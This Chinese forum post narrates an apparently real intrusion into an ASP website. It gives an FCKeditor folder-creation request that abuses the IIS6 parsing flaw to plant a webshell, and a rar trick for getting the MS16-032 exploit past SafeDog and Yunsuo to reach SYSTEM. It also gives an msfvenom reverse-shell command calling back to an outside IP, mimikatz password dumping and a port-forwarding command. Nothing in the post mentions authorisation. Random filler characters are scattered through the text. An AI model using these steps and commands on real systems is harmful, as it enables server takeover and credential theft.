找回密码
 立即注册
查看: 3586|回复: 1
打印 上一主题 下一主题

从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:31:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

+ H+ R( ?% F9 C* H' | D) |

- {3 S, k; g6 o7 W0 q5 Y7 n5 n/ d6 S+ P' @: o/ c8 t; @/ x) A/ \1 \" Y: b8 u0 d: Q3 D k4 G" t/ N& U( p# h: Q9 y& [% B( ?" t; v6 a" _1 I1 e- f! V6 C3 b% X; p' x' G% @& v6 d8 E8 k% e
9 p" R/ t' c. `; B* Y( D

, [. B) @4 A4 W6 b4 ^# h
: l w; P- J! y ?5 w- s
一、 利用getwebshell
) T( r* i+ F% f/ r. l+ [
6 c* o% ] i: R
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
$ R) n+ L% g8 ?/ e5 {% o( o
2 {9 i4 c1 c2 F) y 222.png
$ n3 V, _+ }1 T2 s0 ~
下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
; M* `* A2 @, f. L4 k* o/ y) B333.png
" J* i( P4 R! ?, U; H
下面我们构造一个asp目录,如: ( w6 H2 M' h' s' N- k+ p

7 t* a) Q$ g* J3 Z. i3 Z

^( U; Z( f' {! o http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 " m( Q# v9 M7 m# i9 |/ d/ e

. k% F: a! W' n( g4 l! @1 z2 T2 K

% y4 z9 V( ]! a7 p 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
5 |7 u! Z5 o8 h+ i: k
' C1 [# `0 N% d5 b, b! q* e0 X/ J! S
一、 绕过安全狗云锁提权并且加账号
. G& s' i$ t; {; \444.png
) R+ x$ @$ e/ R% ?$ H7 C- x
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
0 R8 M( ?; o' k2 E ?1 [) s) W
; c) N# z! C$ }; h5 g$ W- V) l
如图:
9 k7 o- w9 T, o4 H- B! r' ~/ K# ]555.png
& L, Z3 \4 ]9 I( F" q: R
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
# s4 N) f) D2 F# c% ]4 v; y
( l: f# W' x8 S3 s+ J% a$ C$ q0 \
一、 利用metasploit
7 Z# { K1 {0 G
8 {1 B3 \( w9 v2 y4 r
首先用pentestbox生成一个64位的payload如下命令
8 z) q0 h% B9 g4 i' [8 f
! M( z3 l! X8 e: } msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
# g6 `! U% E& S7 o% u R# ~( E, q
* a6 O* K& m& F1 d! M3 W- Z* v
为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
# H# z' }* a, G5 i" L8 l6 R 11.png
# e6 y( Z4 U) b: T9 K6 z
下面我们用这个命令抓一下明文密码命令1use mimikatz 命令2kerberos如下图:
: y! v6 Y( l6 {4 Y2 w 13.png
/ \# C( o% ^- _
下面我们来做一个监听如下命令:
7 U4 B- _" f# Y( Z
1 e9 }) S8 ]" {% d0 d& ~; S portfwd add -l 6655 -p 3968 -r 127.0.0.1
,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP6655端口如图:
* K ^ z* D! d8 k) \. X 18.png
6 @6 q; @( N8 q+ P2 A

# g" }7 l c$ I( g: J
; P* e: L" g/ O2 k1 s8 D1 ]- d4 m

) E( P$ Q- x0 J! [

: v/ g g* K5 X I! i! t
8 r' {2 n# A3 ]
0 P+ o0 P: L' }0 u
. V1 M3 M( V' U$ n, K3 z

4 G7 w# `9 h4 l' P3 l& b- F! `9 q6 C
. m* I( J' U0 ~) b% M 0 \4 R6 j3 Q: ?: _9 K

8 z& a) }1 V# S* p
' \6 l3 n# k& n. ~! s

回复

使用道具 举报

沙发
匿名  发表于 2021-11-20 23:30:06
图片怎么都没了
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表